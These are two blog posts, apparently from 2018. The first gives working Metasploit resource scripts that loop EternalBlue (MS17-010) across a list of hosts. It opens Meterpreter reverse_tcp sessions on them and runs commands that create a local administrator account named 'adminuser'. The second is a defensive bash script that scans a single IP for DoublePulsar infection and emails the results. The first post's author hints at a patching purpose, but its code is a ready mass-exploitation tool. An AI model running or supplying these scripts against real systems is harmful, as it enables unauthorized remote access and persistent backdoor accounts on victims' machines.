Thursday, August 16, 2018

remotely exploit a number of hosts with metasploit via eternalblue

in a previous post i have mentioned how to do a scan for doublepulsar infected hosts and how to feed these hosts to msf. that's fine. but, i guess mass-exploiting those hosts is of some utility, too. 
 
   
 ## msfconsole
  
 msf > vulns -R  
 … a lot of text … look at end of output for a file dropped in /tmp e.g. ...  
 RHOSTS => file:/tmp/msf-db-rhosts-20180816-27096-ncow7k  
   
 msf > exit  
   
 # cd ~/.msf4/  
 # cp /tmp/msf-db-rhosts-20180816-27096-ncow7k thewicked  
 # msfconsole -r doublepulsar-loop.rc  
   
 Once all as completed, look through ~/.msf4/logs/doublepuslar.log for adminuser  
 as those hosts have had the local admin user for your evil created.  
   
## files
   
 [doublepulsar-loop.rc]  
   
 <ruby>  
   
 # the rhosts from vuln_db  
 hostsfile="/root/.msf4/thewicked"  
 hosts=[]  
 File.open(hostsfile,"r") do |f|  
 f.each_line do |line|  
 hosts.push line.strip  
 end  
 end  
   
 # msfconsole commands with chained post exploit  
 self.run_single("resource /root/.msf4/doublepulsar.rc")  
   
 # the rhosts loop  
 hosts.each do |rhost|  
 self.run_single("set rhost #{rhost}")  
 self.run_single("exploit")   
 run_single("sleep 2s")  
 end  
   
 </ruby>  
   
 [doublepulsar.rc]  
   
 spool /root/.msf4/logs/doublepulsar.log  
 set consolelogging true  
 set loglevel 5  
 set sessionlogging true  
 set timestampoutput true  
   
 use exploit/windows/smb/ms17_010_eternalblue  
 set VerifyArch False  
 set VerifyTarget False  
 set PAYLOAD windows/x64/meterpreter/reverse_tcp  
 set LHOST   
 set AUTORUNSCRIPT multiscript -rc /root/.msf4/doublepulsar-lsadmin  
   
 [doublepulsar-lsadmin]  
 execute -H -f cmd.exe -a "/c net user adminuser badpassword /add"  
 execute -H -f cmd.exe -a "/c net localgroup administrators /add adminuser"  
 execute -H -f cmd.exe -a "/c bitsadmin task to download a scheduled task to patch and reboot"
 exit
Posted by at No comments:

Monday, August 13, 2018

one-off doublepulsar scan script because sometimes people need to do one thing and one thing only

so yeah. 
 #!/bin/bash  
 EXECUTE=$(date "+%Y%m%d")  
   
 read -p "Enter IP to evaluate: " IP  
 if [[ $IP =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then  
     read -p "Enter email address (or not): " EMAIL  
 else echo "Not a valid IP" && exit 0  
 fi  
   
 rm -rf /tmp/$IP
 mkdir /tmp/$IP  
 cd /tmp/$IP  
   
 #msfconsole  
 sudo msfconsole -x "color false ; banner false ; spool /tmp/$IP/output.msf ; use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS $IP ; run; exit"  
 sed 's/]\ /\\\n/g' /tmp/$IP/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' |sort -u > /tmp/$IP/output.msf.1  
 sed '/VULNERABLE/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.VULN  
 sed '/INFECTED/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.INFECTED  
 clear  
   
 if [ -s /tmp/$IP/output.msf.INFECTED ]  
 then  
     echo " Uh oh $IP DoublePulsar infected"  
     mail -s " $IP DoublePulsar infected " $EMAIL < /tmp/$IP/output.msf.INFECTED  
     mail -s " $IP DoublePulsar intected $EXECUTE " youreffingsysadmin@hell.com < /tmp/$IP/output.msf.1  
 else  
     echo " Phew $IP not infected "  
 fi  
   
 if [ -s /tmp/$IP/output.msf.VULN ]  
 then  
     echo " Sigh $IP DoublePulsar vulnerable "  
     mail -s " $IP DoublePulsar vulnerable " $EMAIL < /tmp/$IP/output.msf.1  
 else  
     echo " Double Phew $IP not DoublePulsar vulnerable"  
 fi  
   
 cd /tmp  
 rm -rf /tmp/$IP  
   
 exit 0
Posted by at No comments:
Subscribe to: Posts (Atom)